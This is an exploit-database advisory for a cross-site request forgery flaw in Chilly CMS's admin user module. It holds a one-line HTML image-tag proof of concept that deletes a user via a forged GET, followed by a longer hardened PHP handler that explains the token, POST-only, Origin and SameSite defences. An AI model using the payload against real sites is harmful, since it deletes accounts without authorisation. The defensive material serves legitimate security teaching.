Chilly CMS CSRF Vulnerability

2010-03-16T00:00:00
ID 1337DAY-ID-9671
Type zdt
Reporter Pratul Agrawal
Modified 2010-03-16T00:00:00

Description

Exploit for unknown platform in category web applications

=============================
Chilly CMS CSRF Vulnerability
=============================

  # Vulnerability found in   Admin module
  # Email                    [email protected]
  # Company                  aksitservices
  # Credit by                Pratul Agrawal
  # Software                 chilly_CMS
  # Category                 CMS / Portals
  # Site page                http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
  # Platform                 PHP
  # Greetz to                Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #

  Targeted URL:  http://www.opensourcecms.com/demo/2/292/chillyCMS

  Script to delete the admin user through cross-site request forgery:

  ................................................................................

  <html>
    <body>
      <img src="http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]" />
    </body>
  </html>

  ................................................................................

  After execution, refresh the page and you can see that the added content has been deleted automatically.
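The image tag above works because the logged-in admin's browser attaches the session cookie to the cross-site GET, and the CMS performs the deletion on that GET with no per-request secret. The following is an added example, not Chilly CMS code, of how a handler of this kind is hardened in PHP: the delete action only accepts POST, it verifies a session-bound token with a constant-time compare, it rejects a foreign Origin/Referer when the browser sends one, and the session cookie is marked SameSite=Lax so it is not attached to cross-site requests in the first place. The function names (csrf_token, csrf_request_is_valid, delete_user), the form layout and the sample user id 42 are assumptions, not the CMS's own.

```php
<?php
// Added example (not Chilly CMS code): a hardened "delete user" handler
// showing the controls that defeat the <img src=...> CSRF above.
// Names such as csrf_request_is_valid() and delete_user() are assumptions.

// Control 1: the session cookie is not sent on cross-site navigations/embeds.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Issue one token per session; embed it in every admin form as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Returns true only when the request is a POST carrying a token that matches
// the session token, and whose Origin (or Referer), if present, is this host.
function csrf_request_is_valid(array $server, array $post, string $sessionToken, string $siteHost): bool
{
    // Control 2: state changes require POST; a GET from an image tag never passes.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // Control 3: token bound to the session, compared in constant time.
    $sent = $post['csrf_token'] ?? '';
    if ($sent === '' || $sessionToken === '' || !hash_equals($sessionToken, $sent)) {
        return false;
    }
    // Control 4: browsers send Origin (or at least Referer) on cross-site POSTs;
    // when one is present it must name this site. Absent headers fall back to
    // the token check alone, which is the primary control.
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '') {
        $host = parse_url($source, PHP_URL_HOST);
        if ($host !== $siteHost) {
            return false;
        }
    }
    return true;
}

// Hardened handler for action=deleteuser: POST only, token required.
if (($_GET['action'] ?? '') === 'deleteuser') {
    if (!csrf_request_is_valid($_SERVER, $_POST, $_SESSION['csrf_token'] ?? '', $_SERVER['SERVER_NAME'])) {
        http_response_code(403);
        exit('Rejected: missing or invalid CSRF token');
    }
    $id = (int)($_POST['id'] ?? 0);
    // delete_user($id);  // the CMS's real deletion routine would be called here (assumed name)
    echo "User {$id} deleted";
    exit;
}

// The admin page renders the delete control as a POST form carrying the token.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="usersgroups.site.php?action=deleteuser">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="hidden" name="id" value="42">
  <button type="submit">Delete user 42</button>
</form>
HTML;
```

With this in place the original PoC fails twice over: the image request is a GET, so it is refused before any token is examined, and even a forged cross-site POST carries neither the session-bound token nor, with SameSite=Lax, the session cookie. Detection-wise, 403 responses on `action=deleteuser` with a missing token or a foreign Origin are the log lines worth alerting on.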

#  0day.today [2018-03-28]  #